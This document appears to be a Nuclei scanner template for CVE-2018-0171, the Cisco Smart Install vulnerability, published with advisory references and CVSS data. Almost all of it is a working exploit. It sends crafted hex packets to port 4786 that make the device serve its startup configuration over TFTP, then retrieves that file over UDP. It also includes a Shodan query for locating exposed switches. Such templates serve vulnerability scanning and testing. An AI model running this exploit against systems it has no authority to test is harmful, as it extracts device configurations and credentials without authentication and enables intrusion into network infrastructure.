id: CVE-2018-0171

info:
  name: Cisco Smart Install - Configuration Download
  author: ritikchaddha,matejsmycka
  severity: critical
  description: |
    A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
    - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
    - https://github.com/AlrikRr/Cisco-Smart-Exploit
    - http://www.securitytracker.com/id/1040580
    - https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-0171
    cwe-id: CWE-20,CWE-787
    epss-score: 0.93123
    epss-percentile: 0.99786
    cpe: cpe:2.3:o:cisco:ios:15.2\(5\)e:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cisco
    product: ios
    shodan-query: 'port:4786 "Smart Install"'
  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp,vkev

flow: tcp(1) && javascript(1)

tcp:
  - inputs:
      - data: 00000001000000010000000A00000050FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF555CCA6800000000000000000000000000000000FFFFFFFF00000001
        type: hex
      - data: 000000010000000100000008000001680001001400000001000000000021D863A560000000020154636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
        type: hex

    host:
      - "{{Hostname}}"
    port: 4786

    matchers:
      - type: word
        part: raw
        words:
          - ""
        internal: true

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);

    code: |
      let packet = bytes.NewBuffer();
      let message = "\x00\x01startup-config\x00octet\x00";
      packet.WriteString(message);

      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      let resp = conn.Recv(4096);

      // Send malformed packet otherwise TFTP will not respond for around minute
      let packet2 = bytes.NewBuffer();
      let message2 = "\x00\x05error"
      packet2.WriteString(message2);
      conn.SendHex(packet2.Hex());
      resp;

    args:
      Host: "{{Host}}"
      Port: 69

    matchers:
      - type: word
        words:
          - 'boot-start-marker'
          - 'version'
          - 'NVRAM'
        condition: and

    extractors:
      - type: regex
        regex:
          - "version\\s+(\\d+\\.\\d+)"
# digest: 4a0a00473045022100a072aed4e1f1b0608e853a90b7026aa31622663d0e0309ef4178a789a5dffb3802200dcaccd55f43030c8adf16004a0f2c03f5891b302ec4cd5529a403f25e9eb103:922c64590222798bb761d5b6d8e72950